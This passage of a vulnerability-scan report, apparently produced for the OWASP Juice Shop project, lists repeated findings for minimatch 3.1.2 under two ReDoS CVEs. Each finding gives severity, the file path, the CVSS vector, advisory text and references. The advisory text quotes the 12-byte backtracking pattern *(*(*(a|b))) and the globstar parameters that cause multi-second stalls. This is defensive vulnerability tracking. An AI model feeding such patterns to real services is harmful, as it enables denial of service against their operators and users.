pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 146: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 147: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 148: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 149: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 150: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 151: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 152: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 153: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 154: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 155: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
